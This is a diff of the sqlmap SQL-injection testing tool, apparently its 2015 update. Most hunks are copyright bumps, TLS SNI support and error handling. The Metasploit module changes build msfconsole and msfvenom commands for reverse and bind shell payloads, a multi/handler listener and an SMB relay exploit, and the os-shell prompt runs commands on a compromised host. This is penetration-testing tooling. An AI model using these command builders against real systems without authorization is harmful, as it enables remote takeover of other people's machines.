kb.pageCompress = popValue()
|
kb.pageCompress = popValue()
|
||||||
|
|
||||||
if not pageLength:
|
if not pageLength:
|
||||||
try:
|
try:
|
||||||
page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
||||||
except MemoryError:
|
except MemoryError:
|
||||||
page, headers, code = None, None, None
|
page, headers, code = None, None, None
|
||||||
warnMsg = "site returned insanely large response"
|
warnMsg = "site returned insanely large response"
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,6 +9,7 @@ import httplib
|
||||||
import socket
|
import socket
|
||||||
import urllib2
|
import urllib2
|
||||||
|
|
||||||
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
|
|
||||||
|
@ -19,7 +20,7 @@ try:
|
||||||
except ImportError:
|
except ImportError:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
_protocols = [ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]
|
_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))
|
||||||
|
|
||||||
class HTTPSConnection(httplib.HTTPSConnection):
|
class HTTPSConnection(httplib.HTTPSConnection):
|
||||||
"""
|
"""
|
||||||
|
@ -41,6 +42,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
|
||||||
|
|
||||||
success = False
|
success = False
|
||||||
|
|
||||||
|
if not kb.tlsSNI:
|
||||||
for protocol in _protocols:
|
for protocol in _protocols:
|
||||||
try:
|
try:
|
||||||
sock = create_sock()
|
sock = create_sock()
|
||||||
|
@ -53,7 +55,28 @@ class HTTPSConnection(httplib.HTTPSConnection):
|
||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
sock.close()
|
sock.close()
|
||||||
except ssl.SSLError, errMsg:
|
except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
|
||||||
|
self._tunnel_host = None
|
||||||
|
logger.debug("SSL connection error occurred ('%s')" % errMsg)
|
||||||
|
|
||||||
|
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
|
||||||
|
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
|
||||||
|
if not success and hasattr(ssl, "SSLContext"):
|
||||||
|
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
|
||||||
|
try:
|
||||||
|
sock = create_sock()
|
||||||
|
context = ssl.SSLContext(protocol)
|
||||||
|
_ = context.wrap_socket(sock, do_handshake_on_connect=False, server_hostname=self.host)
|
||||||
|
if _:
|
||||||
|
kb.tlsSNI = success = True
|
||||||
|
self.sock = _
|
||||||
|
_protocols.remove(protocol)
|
||||||
|
_protocols.insert(0, protocol)
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
sock.close()
|
||||||
|
except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
|
||||||
|
self._tunnel_host = None
|
||||||
logger.debug("SSL connection error occurred ('%s')" % errMsg)
|
logger.debug("SSL connection error occurred ('%s')" % errMsg)
|
||||||
|
|
||||||
if not success:
|
if not success:
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -38,6 +38,7 @@ from lib.core.enums import CHARSET_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import EXPECTED
|
from lib.core.enums import EXPECTED
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
|
from lib.core.exception import SqlmapConnectionException
|
||||||
from lib.core.exception import SqlmapNotVulnerableException
|
from lib.core.exception import SqlmapNotVulnerableException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
||||||
|
@ -371,11 +372,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||||
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
||||||
kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
|
kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
|
||||||
|
fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
|
||||||
|
|
||||||
|
try:
|
||||||
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||||
|
except SqlmapConnectionException:
|
||||||
|
if not fallback:
|
||||||
|
raise
|
||||||
|
|
||||||
count += 1
|
count += 1
|
||||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||||
|
|
||||||
if not found and not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion:
|
if not found and fallback:
|
||||||
warnMsg = "something went wrong with full UNION "
|
warnMsg = "something went wrong with full UNION "
|
||||||
warnMsg += "technique (could be because of "
|
warnMsg += "technique (could be because of "
|
||||||
warnMsg += "limitation on retrieved number of entries)"
|
warnMsg += "limitation on retrieved number of entries)"
|
||||||
|
@ -383,10 +391,12 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
warnMsg += ". Falling back to partial UNION technique"
|
warnMsg += ". Falling back to partial UNION technique"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
|
try:
|
||||||
pushValue(kb.forcePartialUnion)
|
pushValue(kb.forcePartialUnion)
|
||||||
kb.forcePartialUnion = True
|
kb.forcePartialUnion = True
|
||||||
value = _goUnion(query, unpack, dump)
|
value = _goUnion(query, unpack, dump)
|
||||||
found = (value is not None) or (value is None and expectingNone)
|
found = (value is not None) or (value is None and expectingNone)
|
||||||
|
finally:
|
||||||
kb.forcePartialUnion = popValue()
|
kb.forcePartialUnion = popValue()
|
||||||
else:
|
else:
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
@ -442,7 +452,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
|
|
||||||
kb.safeCharEncode = False
|
kb.safeCharEncode = False
|
||||||
|
|
||||||
if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
|
if not any((kb.testMode, conf.dummy, conf.offline)) and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
|
||||||
warnMsg = "in case of continuous data retrieval problems you are advised to try "
|
warnMsg = "in case of continuous data retrieval problems you are advised to try "
|
||||||
warnMsg += "a switch '--no-cast' "
|
warnMsg += "a switch '--no-cast' "
|
||||||
warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
|
warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
|
||||||
|
@ -468,7 +478,7 @@ def goStacked(expression, silent=False):
|
||||||
query = agent.prefixQuery(";%s" % expression)
|
query = agent.prefixQuery(";%s" % expression)
|
||||||
query = agent.suffixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
|
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper())
|
||||||
|
|
||||||
def checkBooleanExpression(expression, expectingNone=True):
|
def checkBooleanExpression(expression, expectingNone=True):
|
||||||
return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
|
return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
|
||||||
|
|
|
@ -1,17 +1,16 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import urllib2
|
import urllib2
|
||||||
|
|
||||||
|
|
||||||
class MethodRequest(urllib2.Request):
|
class MethodRequest(urllib2.Request):
|
||||||
'''
|
"""
|
||||||
Used to create HEAD/PUT/DELETE/... requests with urllib2
|
Used to create HEAD/PUT/DELETE/... requests with urllib2
|
||||||
'''
|
"""
|
||||||
|
|
||||||
def set_method(self, method):
|
def set_method(self, method):
|
||||||
self.method = method.upper()
|
self.method = method.upper()
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,10 +1,11 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import types
|
||||||
import urllib2
|
import urllib2
|
||||||
import urlparse
|
import urlparse
|
||||||
|
|
||||||
|
@ -122,6 +123,27 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||||
req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]
|
req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]
|
||||||
try:
|
try:
|
||||||
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
|
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
|
||||||
|
except urllib2.HTTPError, e:
|
||||||
|
result = e
|
||||||
|
|
||||||
|
# Dirty hack for http://bugs.python.org/issue15701
|
||||||
|
try:
|
||||||
|
result.info()
|
||||||
|
except AttributeError:
|
||||||
|
def _(self):
|
||||||
|
return getattr(self, "hdrs") or {}
|
||||||
|
result.info = types.MethodType(_, result)
|
||||||
|
|
||||||
|
if not hasattr(result, "read"):
|
||||||
|
def _(self, length=None):
|
||||||
|
return e.msg
|
||||||
|
result.read = types.MethodType(_, result)
|
||||||
|
|
||||||
|
if not getattr(result, "url", None):
|
||||||
|
result.url = redurl
|
||||||
|
|
||||||
|
if not getattr(result, "code", None):
|
||||||
|
result.code = 999
|
||||||
except:
|
except:
|
||||||
redurl = None
|
redurl = None
|
||||||
result = fp
|
result = fp
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,19 +1,24 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import sys
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safechardecode
|
from extra.safe2bin.safe2bin import safechardecode
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import getSQLSnippet
|
from lib.core.common import getSQLSnippet
|
||||||
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import isStackingAvailable
|
from lib.core.common import isStackingAvailable
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import OS
|
||||||
from lib.core.exception import SqlmapFilePathException
|
from lib.core.exception import SqlmapFilePathException
|
||||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from lib.core.shell import autoCompletion
|
from lib.core.shell import autoCompletion
|
||||||
|
@ -116,13 +121,14 @@ class Abstraction(Web, UDF, Xp_cmdshell):
|
||||||
infoMsg += "'x' or 'q' and press ENTER"
|
infoMsg += "'x' or 'q' and press ENTER"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
autoCompletion(osShell=True)
|
autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
command = None
|
command = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
command = raw_input("os-shell> ")
|
command = raw_input("os-shell> ")
|
||||||
|
command = getUnicode(command, encoding=sys.stdin.encoding)
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print
|
print
|
||||||
errMsg = "user aborted"
|
errMsg = "user aborted"
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -24,6 +24,7 @@ from lib.core.common import randomRange
|
||||||
from lib.core.common import randomStr
|
from lib.core.common import randomStr
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
@ -61,8 +62,10 @@ class Metasploit:
|
||||||
self.localIP = getLocalIP()
|
self.localIP = getLocalIP()
|
||||||
self.remoteIP = getRemoteIP() or conf.hostname
|
self.remoteIP = getRemoteIP() or conf.hostname
|
||||||
self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
|
self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
|
||||||
|
self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
|
||||||
self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
|
self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
|
||||||
self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
|
self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
|
||||||
|
self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom"))
|
||||||
|
|
||||||
if IS_WIN:
|
if IS_WIN:
|
||||||
_ = conf.msfPath
|
_ = conf.msfPath
|
||||||
|
@ -76,8 +79,10 @@ class Metasploit:
|
||||||
if _ == old:
|
if _ == old:
|
||||||
break
|
break
|
||||||
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
|
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
|
||||||
|
self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
|
||||||
self._msfEncode = "ruby %s" % self._msfEncode
|
self._msfEncode = "ruby %s" % self._msfEncode
|
||||||
self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
|
self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
|
||||||
|
self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
|
||||||
|
|
||||||
self._msfPayloadsList = {
|
self._msfPayloadsList = {
|
||||||
"windows": {
|
"windows": {
|
||||||
|
@ -326,6 +331,7 @@ class Metasploit:
|
||||||
self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
|
self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
|
||||||
|
|
||||||
def _forgeMsfCliCmd(self, exitfunc="process"):
|
def _forgeMsfCliCmd(self, exitfunc="process"):
|
||||||
|
if kb.oldMsf:
|
||||||
self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
|
self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
|
||||||
self._cliCmd += " EXITFUNC=%s" % exitfunc
|
self._cliCmd += " EXITFUNC=%s" % exitfunc
|
||||||
self._cliCmd += " LPORT=%s" % self.portStr
|
self._cliCmd += " LPORT=%s" % self.portStr
|
||||||
|
@ -341,10 +347,27 @@ class Metasploit:
|
||||||
self._cliCmd += " DisableCourtesyShell=true"
|
self._cliCmd += " DisableCourtesyShell=true"
|
||||||
|
|
||||||
self._cliCmd += " E"
|
self._cliCmd += " E"
|
||||||
|
else:
|
||||||
|
self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
|
||||||
|
self._cliCmd += "; set EXITFUNC %s" % exitfunc
|
||||||
|
self._cliCmd += "; set LPORT %s" % self.portStr
|
||||||
|
|
||||||
|
if self.connectionStr.startswith("bind"):
|
||||||
|
self._cliCmd += "; set RHOST %s" % self.rhostStr
|
||||||
|
elif self.connectionStr.startswith("reverse"):
|
||||||
|
self._cliCmd += "; set LHOST %s" % self.lhostStr
|
||||||
|
else:
|
||||||
|
raise SqlmapDataException("unexpected connection type")
|
||||||
|
|
||||||
|
if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
|
||||||
|
self._cliCmd += "; set DisableCourtesyShell true"
|
||||||
|
|
||||||
|
self._cliCmd += "; exploit'"
|
||||||
|
|
||||||
def _forgeMsfCliCmdForSmbrelay(self):
|
def _forgeMsfCliCmdForSmbrelay(self):
|
||||||
self._prepareIngredients(encode=False)
|
self._prepareIngredients(encode=False)
|
||||||
|
|
||||||
|
if kb.oldMsf:
|
||||||
self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
|
self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
|
||||||
self._cliCmd += " EXITFUNC=thread"
|
self._cliCmd += " EXITFUNC=thread"
|
||||||
self._cliCmd += " LPORT=%s" % self.portStr
|
self._cliCmd += " LPORT=%s" % self.portStr
|
||||||
|
@ -359,9 +382,29 @@ class Metasploit:
|
||||||
raise SqlmapDataException("unexpected connection type")
|
raise SqlmapDataException("unexpected connection type")
|
||||||
|
|
||||||
self._cliCmd += " E"
|
self._cliCmd += " E"
|
||||||
|
else:
|
||||||
|
self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
|
||||||
|
self._cliCmd += "; set EXITFUNC thread"
|
||||||
|
self._cliCmd += "; set LPORT %s" % self.portStr
|
||||||
|
self._cliCmd += "; set SRVHOST %s" % self.lhostStr
|
||||||
|
self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort()
|
||||||
|
|
||||||
|
if self.connectionStr.startswith("bind"):
|
||||||
|
self._cliCmd += "; set RHOST %s" % self.rhostStr
|
||||||
|
elif self.connectionStr.startswith("reverse"):
|
||||||
|
self._cliCmd += "; set LHOST %s" % self.lhostStr
|
||||||
|
else:
|
||||||
|
raise SqlmapDataException("unexpected connection type")
|
||||||
|
|
||||||
|
self._cliCmd += "; exploit'"
|
||||||
|
|
||||||
def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
|
def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
|
||||||
self._payloadCmd = "%s %s" % (self._msfPayload, self.payloadConnStr)
|
if kb.oldMsf:
|
||||||
|
self._payloadCmd = self._msfPayload
|
||||||
|
else:
|
||||||
|
self._payloadCmd = "%s -p" % self._msfVenom
|
||||||
|
|
||||||
|
self._payloadCmd += " %s" % self.payloadConnStr
|
||||||
self._payloadCmd += " EXITFUNC=%s" % exitfunc
|
self._payloadCmd += " EXITFUNC=%s" % exitfunc
|
||||||
self._payloadCmd += " LPORT=%s" % self.portStr
|
self._payloadCmd += " LPORT=%s" % self.portStr
|
||||||
|
|
||||||
|
@ -373,6 +416,7 @@ class Metasploit:
|
||||||
if Backend.isOs(OS.LINUX) and conf.privEsc:
|
if Backend.isOs(OS.LINUX) and conf.privEsc:
|
||||||
self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
|
self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
|
||||||
|
|
||||||
|
if kb.oldMsf:
|
||||||
if extra == "BufferRegister=EAX":
|
if extra == "BufferRegister=EAX":
|
||||||
self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
|
self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
|
||||||
|
|
||||||
|
@ -380,6 +424,14 @@ class Metasploit:
|
||||||
self._payloadCmd += " %s" % extra
|
self._payloadCmd += " %s" % extra
|
||||||
else:
|
else:
|
||||||
self._payloadCmd += " X > \"%s\"" % outFile
|
self._payloadCmd += " X > \"%s\"" % outFile
|
||||||
|
else:
|
||||||
|
if extra == "BufferRegister=EAX":
|
||||||
|
self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
|
||||||
|
|
||||||
|
if extra is not None:
|
||||||
|
self._payloadCmd += " %s" % extra
|
||||||
|
else:
|
||||||
|
self._payloadCmd += " -f exe > \"%s\"" % outFile
|
||||||
|
|
||||||
def _runMsfCliSmbrelay(self):
|
def _runMsfCliSmbrelay(self):
|
||||||
self._forgeMsfCliCmdForSmbrelay()
|
self._forgeMsfCliCmdForSmbrelay()
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,13 +1,14 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
|
from lib.core.common import checkFile
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import isStackingAvailable
|
from lib.core.common import isStackingAvailable
|
||||||
|
@ -146,6 +147,7 @@ class UDF:
|
||||||
|
|
||||||
if len(self.udfToCreate) > 0:
|
if len(self.udfToCreate) > 0:
|
||||||
self.udfSetRemotePath()
|
self.udfSetRemotePath()
|
||||||
|
checkFile(self.udfLocalFile)
|
||||||
written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
|
written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
|
||||||
|
|
||||||
if written is not True:
|
if written is not True:
|
||||||
|
@ -359,6 +361,9 @@ class UDF:
|
||||||
warnMsg += "<= %d are allowed" % len(udfList)
|
warnMsg += "<= %d are allowed" % len(udfList)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if not isinstance(choice, int):
|
||||||
|
break
|
||||||
|
|
||||||
cmd = ""
|
cmd = ""
|
||||||
count = 1
|
count = 1
|
||||||
udfToCall = udfList[choice - 1]
|
udfToCall = udfList[choice - 1]
|
||||||
|
|
|
@ -1,14 +1,15 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
